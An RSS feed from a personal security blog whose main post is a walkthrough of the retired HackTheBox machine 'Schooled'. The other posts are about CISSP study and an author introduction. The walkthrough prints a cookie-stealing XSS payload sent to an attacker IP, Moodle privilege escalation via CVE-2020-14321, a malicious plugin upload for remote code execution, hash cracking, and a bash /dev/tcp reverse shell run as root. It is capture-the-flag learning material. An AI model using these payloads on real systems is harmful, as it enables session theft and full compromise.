<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Elizabeth Beacom]]></title><description><![CDATA[Information Security and Infrastructure Management]]></description><link>https://elizabethbeacom.ca/</link><image><url>https://elizabethbeacom.ca/favicon.png</url><title>Elizabeth Beacom</title><link>https://elizabethbeacom.ca/</link></image><generator>Ghost 5.75</generator><lastBuildDate>Thu, 23 Apr 2026 12:24:48 GMT</lastBuildDate><atom:link href="https://elizabethbeacom.ca/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[HackTheBox - Schooled]]></title><description><![CDATA[A walk through of the HackTheBox Machine Schooled.]]></description><link>https://elizabethbeacom.ca/hackthebox-schooled/</link><guid isPermaLink="false">613a66ea88db3603ef827cdf</guid><category><![CDATA[HackTheBox]]></category><category><![CDATA[WalkThrough]]></category><dc:creator><![CDATA[Elizabeth Beacom]]></dc:creator><pubDate>Sat, 11 Sep 2021 19:00:00 GMT</pubDate><media:content url="https://elizabethbeacom.ca/content/images/2021/09/2021-09-09-12_49_44-Hack-The-Box-__-Hack-The-Box-and-10-more-pages---Personal---Microsoft--Edge.png" medium="image"/><content:encoded><![CDATA[<img src="https://elizabethbeacom.ca/content/images/2021/09/2021-09-09-12_49_44-Hack-The-Box-__-Hack-The-Box-and-10-more-pages---Personal---Microsoft--Edge.png" alt="HackTheBox - Schooled"><p>As of today the Schooled box on Hack the Box has been retired so I can finally publish this walk through, which will also be the first one I have ever done for a box.</p><p>I haven&apos;t done too many medium boxes yet so this one was challenging for me and a bit frustrating at times too. </p><h2 id="enumeration">Enumeration</h2><p><strong>NMAP</strong></p><p>Like any box I start with a quick nmap scan to see what ports are open and available. My inital scan just checks all tcp ports with a syn connection.</p><blockquote>$nmap -p- -sS -oG tcp_all_ports 10.10.10.234</blockquote><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="345" height="88"><figcaption>3 open ports, 33060 looks interesting but probably isn&apos;t useful right away.</figcaption></figure><p>Since I know that 80/tcp is open and running a webserver let&apos;s start there. The site loads and at this point I manually enumerate, clicking on all the links and quickly checking to see what other resources are hit. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-1.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="1088" height="777" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-1.png 600w, https://elizabethbeacom.ca/content/images/size/w1000/2021/09/image-1.png 1000w, https://elizabethbeacom.ca/content/images/2021/09/image-1.png 1088w" sizes="(min-width: 720px) 720px"><figcaption>A nice website</figcaption></figure><p><strong>GoBuster</strong></p><p>I couldn&apos;t find anything with my enumeration so I went to my go to scan too gobuster to see if there were any files or folders that were not immediately available on the site.</p><blockquote>$gobuster dir -u http://10.10.10.234 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100</blockquote><p>The scans came back with nothing, one thing I did note during my manual enumeration was there was a domain name in the footer. Let&apos;s add this to my /etc/hosts and see if there&apos;s a vhost for the domain name on the server.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-2.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="533" height="68"><figcaption>There&apos;s a domain in the footer</figcaption></figure><p>Adding the record to my hosts file didn&apos;t change anything, but maybe there&apos;s a subdomain vhost available to target. There&apos;s a reason I like to use gobuster, we can scan for vhosts too!</p><blockquote>$gobuster vhost -u http://schooled.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 100</blockquote><p>Success!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-3.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="722" height="234" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-3.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-3.png 722w" sizes="(min-width: 720px) 720px"><figcaption>Found a vhost with moodle.schooled.htb</figcaption></figure><p>I added the subdomain to my /etc/hosts file and open my browser to the site. I get a basic moodle installation with both guest account and account creation enabled.</p><p><strong>Moodle</strong></p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-4.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="905" height="653" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-4.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-4.png 905w" sizes="(min-width: 720px) 720px"></figure><p>Let&apos;s skip the guest account and just create a new account. Attempting to create a fake student account it want&apos;s an email address from the organizations domain (student.schooled.htb), so I changed it to match that and Moodle did not require an email confirmation of the account. So I now had authenticated access as a student.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-5.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="651" height="471" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-5.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-5.png 651w"><figcaption>Account creation failed due to email</figcaption></figure><p>As a student account, it is severely restricted, I can enroll or participate in classes and that is it. There is how ever a class that allows for self-enrollment so let&apos;s enroll and check it out.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-6.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="712" height="272" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-6.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-6.png 712w"><figcaption>The first piece of important information</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-8.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="693" height="276" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-8.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-8.png 693w"><figcaption>In the user profile there&apos;s a field for MoodleNet profile</figcaption></figure><p></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-7.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="413" height="347"><figcaption>We have XSS available</figcaption></figure><p>So I know there&apos;s an XSS entry point and I know that the teacher will be checking the user profiles for this entry. Let&apos;s craft a request to send the teacher&apos;s cookies to me when they visit.</p><blockquote>&lt;script&gt;image = new Image(); image.src = &apos;http://10.10.14.30:8888/?&apos;+document.cookie;&lt;/script&gt;</blockquote><p>We can then start a netcat listener and wait.....</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-9.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="701" height="214" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-9.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-9.png 701w"><figcaption>The teacher sent us his cookie, yum!</figcaption></figure><p>We have the teacher&apos;s cookie, let&apos;s use it in our session to authenticate as them.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-10.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="1085" height="708" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-10.png 600w, https://elizabethbeacom.ca/content/images/size/w1000/2021/09/image-10.png 1000w, https://elizabethbeacom.ca/content/images/2021/09/image-10.png 1085w" sizes="(min-width: 720px) 720px"><figcaption>We are now the teacher!</figcaption></figure><h2 id="foothold">Foothold</h2><p>So as the teacher we have more privileges but still not full administrator access to Moodle. Doing some research I found CVE-2020-14321, which will allow a teacher to privilege escalate to a &quot;manager&quot; from there we can gain RCE and a shell.</p><p>The steps to escalate to manager, as taken from <a href="https://github.com/HoangKien1020/CVE-2020-14321?ref=elizabethbeacom.ca">https://github.com/HoangKien1020/CVE-2020-14321</a> :</p><ol><li>Start to manually enroll a user who has manager privilege to your class.</li><li>Intercept the enrollment GET request and change the values to your teacher ID and the role to the manager role id, which is 1.</li><li>Log in as user</li><li>Modify the Manager role definition to allow plugin install</li></ol><p>Going to the Profile link as the teacher will provide us with the id for the teacher</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-11.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="1065" height="364" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-11.png 600w, https://elizabethbeacom.ca/content/images/size/w1000/2021/09/image-11.png 1000w, https://elizabethbeacom.ca/content/images/2021/09/image-11.png 1065w" sizes="(min-width: 720px) 720px"><figcaption>The teacher id is 24.</figcaption></figure><p>We can then go to the Participants in the class and click enroll.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-15.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="1246" height="360" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-15.png 600w, https://elizabethbeacom.ca/content/images/size/w1000/2021/09/image-15.png 1000w, https://elizabethbeacom.ca/content/images/2021/09/image-15.png 1246w" sizes="(min-width: 720px) 720px"><figcaption>Manually enroll a new user</figcaption></figure><p>Go ahead an preselect Lianne Carter and then turn on Burp and intercept the request that is sent when you click &quot;Enrol users&quot;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-14.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="808" height="395" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-14.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-14.png 808w" sizes="(min-width: 720px) 720px"><figcaption>Through earlier enumeration of users we know Lianne as a global manager role.</figcaption></figure><p>Update the values highlighted below to 24 and 1.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-13.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="979" height="267" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-13.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-13.png 979w" sizes="(min-width: 720px) 720px"><figcaption>The intercepted GET request in Burp</figcaption></figure><p>We do need to let the original request do through at least once too to enrol Lianne to the class. When we do, she we can click on her user account in the list of participants. This profile will have an &quot;Log in as&quot; option we can use to escalate our privilege to administrator. </p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-12.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="930" height="724" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-12.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-12.png 930w" sizes="(min-width: 720px) 720px"></figure><p>We can then access the administrator panel from the left panel.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-32.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="290" height="376"></figure><p>In the Site administration we want to go to the &quot;Users&quot; and &quot;Define Roles&quot;</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-33.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="826" height="548" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-33.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-33.png 826w" sizes="(min-width: 720px) 720px"></figure><p>We want to manage the &quot;Manager&quot; role, so click on it. </p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-35.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="1222" height="195" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-35.png 600w, https://elizabethbeacom.ca/content/images/size/w1000/2021/09/image-35.png 1000w, https://elizabethbeacom.ca/content/images/2021/09/image-35.png 1222w" sizes="(min-width: 720px) 720px"></figure><p>And then click on &quot;Edit&quot;</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-36.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="949" height="169" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-36.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-36.png 949w" sizes="(min-width: 720px) 720px"></figure><p>In this area, if you scroll down you&apos;ll find a &quot;Filter&quot; search box, type &quot;site con&quot; and the long list of settings will shrink. This is the only permission we need to grant to our user to take advantage of the Plugin Install which we will use to upload our RCE exploit.</p><p>Click Save and then return to the main Site Administration page</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-37.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="575" height="160"></figure><p>Now we want to focus on the plugin and install plugins option.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-38.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="749" height="289" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-38.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-38.png 749w" sizes="(min-width: 720px) 720px"></figure><p>Plugin Install</p><p>A Moodle plugin is just a zip file with a simple folder structure, in this situation we can just use the block plugin type. The block_shell.php file is similar to the one found within the rce.zip from Hoang Kien in the link above. I added an additional file to run a reverse shell automatically because I had trouble getting one with the other.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-39.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="252" height="110"></figure><p>Adding the plugin to install is straight forward, however make note of the directory the plugin is written to.</p><p>We can then execute the files from our browser and have it connect to a waiting netcat session.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-41.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="776" height="92" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-41.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-41.png 776w" sizes="(min-width: 720px) 720px"><figcaption>Start the reverse shell from the browser</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-23.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="557" height="138"><figcaption>Reverse shell</figcaption></figure><h2 id="user">User</h2><p>We have a reverse shell but it sucks, python doesn&apos;t run, but the $PATH is limited so let&apos;s search.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-22.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="266" height="55"></figure><p>find is all powerful, since this is a FreeBSD box we can use -perm +111 to search for executable files.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-19.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="511" height="432"></figure><p>We have python so we can get a better shell going on.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-21.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="712" height="64" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-21.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-21.png 712w"><figcaption>That&apos;s nicer</figcaption></figure><blockquote>/usr/local/bin/python3 -c &apos;import pty;pty.spawn(&quot;/bin/bash&quot;)&apos;</blockquote><p>With our foothold in place we can begin to enumerate for the user. Let&apos;s find out what local users we have. There are two: <strong>jamie </strong>and <strong>steve</strong>.</p><p>Remember that port 33060 that was open, that means there&apos;s a mysql server running, let&apos;s see if we can find some configuration files for it with Moodle. The config file is in the Moodle root directory and called config.php</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-20.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="690" height="549" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-20.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-20.png 690w"></figure><p>Ok we have a database name, username and password for mysql, let&apos;s try to query it from our reverse shell.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-42.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="645" height="61" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-42.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-42.png 645w"></figure><p>Like python, mysql isn&apos;t in our PATH so let&apos;s search for it. </p><p><em>During my original attack on this box it was now when I realized I could also search for python and get a better shell since I had to search for mysql.</em></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-18.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="729" height="189" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-18.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-18.png 729w" sizes="(min-width: 720px) 720px"><figcaption>Found it.</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-17.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="817" height="294" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-17.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-17.png 817w" sizes="(min-width: 720px) 720px"><figcaption>DB ready to query</figcaption></figure><p>Once we&apos;re connected to the DB let&apos;s enumerate. Let&apos;s find out what tables there are, from there we found a user table what columns of data are there. Ok let&apos;s select the columns we&apos;re interested in.</p><blockquote>SHOW TABLES;<br>DESCRIBE mdl_user;<br>SELECT username, password, firstname, lastname FROM mdl_user;</blockquote><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-27.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="881" height="145" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-27.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-27.png 881w" sizes="(min-width: 720px) 720px"></figure><p>Ok we have some user hashes, perfect. We know that jamie is one of the local users on this box and he also has password hash here for Moodle. Let&apos;s see if we can crack it. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-24.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="796" height="585" srcset="https://elizabethbeacom.ca/content/images/size/w600/2021/09/image-24.png 600w, https://elizabethbeacom.ca/content/images/2021/09/image-24.png 796w" sizes="(min-width: 720px) 720px"><figcaption>Hashcat to the rescue</figcaption></figure><p>Password was cracked, we can now ssh directly to the box as Jamie and get the user.txt flag.</p><h2 id="root">Root</h2><p>Starting to enumerate for root priv escalation I usually always run sudo -l to see what is available first, it&apos;s usually the easiest way to root if there&apos;s a NOPSSWD option for sudo.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-43.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="525" height="125"><figcaption>I love it when I see this</figcaption></figure><p>We know we can run /usr/share/pkg install with sudo can we exploit it, checking <a href="https://gtfobins.github.io/gtfobins/pkg/?ref=elizabethbeacom.ca#sudo">gtfobins </a>we can.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-46.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="512" height="146"><figcaption>From GTFOBins</figcaption></figure><p>In this case, I don&apos;t want to execute &apos;id&apos; but I will execute another reverse shell. The reason I need to execute another reverse shell is while I was attempting to get a shell I figured out why my earlier attempts had also failed with the PHP script. There is a security policy that blocks it.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/09/image-47.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="451" height="85"><figcaption>Security policy blocking nc -e /bin/bash</figcaption></figure><p>So I just bypass it with another reverse connection which will get executed in the context of root while using the sudo pkg install option.</p><blockquote>echo &quot;id; bash -c &apos;exec bash -i &amp;&gt; /dev/tcp/10.10.14.30/4445 &lt;&amp;1&apos;&quot; &gt; $TF/x.sh</blockquote><p>Once we run the pkg install we will get a connection and have root access.</p><figure class="kg-card kg-image-card"><img src="https://elizabethbeacom.ca/content/images/2021/09/2021-09-09-12_45_22-Kali-Workstation---VMware-Workstation-3.png" class="kg-image" alt="HackTheBox - Schooled" loading="lazy" width="563" height="164"></figure><h2 id="conclusion">Conclusion</h2><p>The amount of enumeration and steps needed to get to a full system own was incredible. Out of the boxes I&apos;ve rooted so far this one felt like a real production box, including the XSS needed to elevate from student to teacher.</p><p>I&apos;m not sure how many hours I put into this one, it was certainly above normal. I admittedly did go down several wrong paths early on with enumeration. The idea of enumerating the vhosts didn&apos;t occur to me at first I got a hint from the HackTheBox Official Discussion about the other things that GoBuster could enumerate. </p>]]></content:encoded></item><item><title><![CDATA[Passed the CISSP Exam]]></title><description><![CDATA[<p>As I mentioned in my last post I scheduled my attempt for the CISSP exam on August 19, 2021. I&apos;m happy to announce after 100 questions and about an hour and 20 minutes the test ended for me and I provisionally passed. This week I started the endorsement</p>]]></description><link>https://elizabethbeacom.ca/provisionally-passed-the-cissp/</link><guid isPermaLink="false">612ed86c5d5c360e0249bb95</guid><category><![CDATA[CISSP]]></category><category><![CDATA[Certification]]></category><dc:creator><![CDATA[Elizabeth Beacom]]></dc:creator><pubDate>Wed, 01 Sep 2021 02:12:12 GMT</pubDate><content:encoded><![CDATA[<p>As I mentioned in my last post I scheduled my attempt for the CISSP exam on August 19, 2021. I&apos;m happy to announce after 100 questions and about an hour and 20 minutes the test ended for me and I provisionally passed. This week I started the endorsement process and await the confirmation of my certification.</p><p>I thought it would be a great idea to &#xA0;share about the resources and methods I used to pass the exam.</p><h2 id="resources">Resources</h2><ol><li><strong>Sybex CISSP 8th edition - </strong>This book is massive as it encompasses all of the content on the exam. I made the mistake with my earlier attempts to study thinking I had to read this book cover to cover. I never did, it&apos;s way too massive and detailed to really read cover to cover. What I did use this book for was as I tested myself was refer back to it on material where I found significant gaps on my knowledge.</li><li><strong>Mike Chapple&apos;s CISSP Cert Prep (2021) on LinkedIn Learning - </strong>Since the exam underwent some changes in May 2021, I knew there might be some gaps in my existing resources. I found the videos easy to follow and Mike&apos;s pace and method of leading the courses worked really well for me. Many of the notes that I took were from these videos.</li><li><strong>Eleventh Hour CISSP audiobook on Audible - </strong>This book is a little more dated but I used one of my monthly Audible credits to get it and listened to it a couple of times. I usually listened while doing chores around the house and while commuting to work. It was really good at narrowing the content to some really key points in each of the 8 domains.</li><li><strong>Pocket Prep iOS App -</strong> I started using this just a few days before my actual exam and I wish I had started using it sooner. Up until the point I had just used the practice tests that accompanied the Sybex book and the (ISC)2 Official App which compared to the questions I experienced on the exam this one was far better.</li><li><strong>Sybex and (ISC)2 Official App Practice Questions - </strong>These were ok for doing quick checks on my knowledge levels. I did appreciate the Flash Card capability on the Official app as it was nice during a lunch hour to test my knowledge on words, concepts, and abbreviations.</li></ol><h2 id="methods">Methods</h2><p>So my methods are mine this is what worked for me, it might not work for you but gives you an idea. Yes, I gave myself nearly 6 months of time to study; unfortunately, with kids, work and the rest of my life, time passed way too quickly.</p><p>In the end I gave myself a solid 8 weeks of committed study, a week per domain and probably about 2-3 hours a day. I started the week watching the domain specific course on LinkedIn learning and taking notes. At that point I tested my knowledge with the practice questions, I usually did about 100 to get a good gauged of my knowledge. After marking the questions I took notes of the ones I got wrong and then and either reviewed the LinkedIn learning again, or would often pull the Sybex book out and read a few paragraphs on the subject. At the end of the week I&apos;d do another 100 questions and compare my first round of questions and see if there were any on going gaps in my knowledge.</p><p>When I got to the end of the 8 weeks I still had 2 weeks left before my test, at this point I knew there were a couple of domains I was still week so they became a bit of a bigger focus for me. With 1 week left before the exam I focused entirely on just quizzing myself either with flashcards, or the practice questions from any of the resources I used.</p><p><strong>Bonus</strong>, it&apos;s a short video but I watched the Kelly Handerhan - &quot;Why You Will Pass the CISSP Exam&quot; video on YouTube the night before I wrote the test and again while I was in the parking lot waiting to go into the testing centre. It really helped I think grounding my mindset for the exam.</p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/v2Y6Zog8h2A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></figure>]]></content:encoded></item><item><title><![CDATA[The start of my CISSP journey]]></title><description><![CDATA[<p>I&apos;m a habitual procrastinator in my personal life; I don&apos;t know if it&apos;s because of my undiagnosed ADD, or something else. I&apos;ve had a copy of the Sybex CISSP Official Study Guide since January 2019. At the time I ordered it I</p>]]></description><link>https://elizabethbeacom.ca/start-of-my-cissp-journey/</link><guid isPermaLink="false">6022d3e61046e11ad129602d</guid><category><![CDATA[CISSP]]></category><category><![CDATA[Certification]]></category><dc:creator><![CDATA[Elizabeth Beacom]]></dc:creator><pubDate>Tue, 09 Feb 2021 18:47:43 GMT</pubDate><content:encoded><![CDATA[<p>I&apos;m a habitual procrastinator in my personal life; I don&apos;t know if it&apos;s because of my undiagnosed ADD, or something else. I&apos;ve had a copy of the Sybex CISSP Official Study Guide since January 2019. At the time I ordered it I had fully intended to write it that year in the fall after studying. Unfortunately: life, kids, work all got in the way of me studying for it and I just never really started.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://elizabethbeacom.ca/content/images/2021/02/image.png" class="kg-image" alt loading="lazy" width="594" height="215"><figcaption>The Katelyn Ilkani Twitter post I saw announcing Battleship Discord</figcaption></figure><p>Fast forward to 2021, I&apos;ve been going back and forth on getting a certification, part of me really wants to complete the OSCP, but in my current role it&apos;s unlikely to be much use. I then saw a post on Twitter about a new Discord server that will be hosting study groups for OSCP, CISSP and other security related certifications. I immediately signed up and joined the CISSP study group, while introducing myself I realized that many others in the group had already booked their exams, and it was something I had never done. As it turns out watching $900 CAD leave your bank account is a pretty good motivator for studying. </p><blockquote><strong>As of right now on August 19, 2021 I will sit to write the CISSP exam.</strong></blockquote><p>I&apos;ve begun to develop my study plan which I&apos;ll share here once it&apos;s completed later this week. In addition to all of this; the CISSP exam is undergoing changes on May 1, 2021 so while my book is based on the old exam, I&apos;ve had to gather additional resources for the changes in the form of LinkedIn training videos by Mike Chapple on Lynda.com and I&apos;m working on a reference sheet comparing the exam outlines, which I will also share here.</p><p>With the pending changes to the exam I am also contemplating moving my exam date ahead to April, but given I&apos;m a single mom to 2 young kids half of the time, I don&apos;t want to over commit myself. Once I develop my study plan and start to work through over the next couple of weeks I should have a better idea of the viability of taking the exam earlier.</p>]]></content:encoded></item><item><title><![CDATA[Introduction]]></title><description><![CDATA[<p>A new website, a quick introduction.</p><p>My name is Elizabeth Beacom, I am an IT Manager in the area of Infrastructure and Security with nearly 20 years of experience. My experience spans from software development to system and network administration, with various industries from construction to education.</p><p>My passion has</p>]]></description><link>https://elizabethbeacom.ca/introduction/</link><guid isPermaLink="false">5f2048fb33b2313bab196974</guid><dc:creator><![CDATA[Elizabeth Beacom]]></dc:creator><pubDate>Tue, 28 Jul 2020 16:24:55 GMT</pubDate><content:encoded><![CDATA[<p>A new website, a quick introduction.</p><p>My name is Elizabeth Beacom, I am an IT Manager in the area of Infrastructure and Security with nearly 20 years of experience. My experience spans from software development to system and network administration, with various industries from construction to education.</p><p>My passion has always been cybersecurity, as my initial interest in computers was that of a hacker. I learned early on, on my own, how computers worked and also how they could break. I got in trouble in middle school for learning how the security controls on the lab computers could be bypassed and disabled, and then showing some friends who promptly broke the OS install on the computers and pointed their fingers at me.</p><p>I obtained my Bachelors Degree in Information Technology (BTech) from Kwantlen Polytechnic in 2010 and began working as a software developer in 2005 during a first term co-op placement. Utilizing my depth of skills I began to expand into a DevOps role and worked on creating continuous integration in a agile software development lifecycle while continuing to focus on security by establishing automated unit testing of code and routine audits of code.</p><p>As my DevOps role expanded I began to shift into a more system administration role, this continued until I moved to my current employer. Starting as system administrator with my current employer I found a large gap in their networking needs which had me shift laterally into a network administration role. Early on with my current employer I developed a segmented network design improving routing and basic security. This eventually a large scale project which moved the 45 sites off numerous Site-To-Site VPN tunnels and on to a MPLS network. During the large project we also replaced the existing firewalls and began to developer stronger security policies on them to better log, filter and control traffic passing through the network. This lead to my current role and back to the direct core of my passion in cyber security and information security.</p><p>This blog is mostly a reflection of my many years of work and education. As I started dive back into the depths of cyber security I found myself wanting to give back to the community and share my knowledge. I also saw it as an opportunity to document my own growth and create some self accountability as I work towards my OSCP, CISSP and potentially a MBA down the road.</p>]]></content:encoded></item></channel></rss>